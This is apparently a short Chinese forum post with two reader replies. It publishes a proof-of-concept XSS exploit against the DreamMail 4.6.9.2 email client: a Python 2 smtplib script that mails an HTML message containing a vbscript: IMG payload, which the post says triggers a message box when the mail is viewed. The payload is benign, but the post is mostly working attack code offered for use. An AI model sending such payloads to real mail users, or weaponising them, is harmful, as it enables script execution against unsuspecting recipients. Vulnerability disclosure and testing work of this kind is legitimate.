Dreammail V4.6.9.2 XSS漏洞利用

Jumbo

针对版本：DreamMail 4.6.9.2
测试环境：windows xp sp3
python版本：2.6
测试邮箱：126.com

#-*- coding:UTF-8 -*-  #@小五义 http://www.cnblogs.com/xiaowuyi import smtplib, urllib2

payload = '''<IMG SRC='vbscript:msgbox("Hello world!")'>''' def sendMail(toemail, smtpsrv, username, password):
        msg = "From: XXXX@126.com\n" msg += "To:YYYY@126.com\n" msg += 'Date: Today\r\n' msg += "Subject: xss payload\n" msg += "Content-type: text/html\n\n" msg += payload + "\r\n\r\n" server = smtplib.SMTP()
        server.connect(smtpsrv)
        server.login(username,password) try:
                server.sendmail(username, toemail, msg) except Exception, e: print "[-] Failed to send email:" print "[*] " + str(e)
        server.quit()

username = "XXXX@126.com" #也可使用其它邮件服务器 password = "XXXXX" #密码 toemail = "YYYY@126.com" smtpsrv = "smtp.126.com" print "[*] Sending Email" sendMail(toemail, smtpsrv, username, password)

发送成功后，当用dreammail浏览该邮件时，会弹窗提示:Hello word！
仅供测试之用

支持一下

学习了，谢谢分享、、、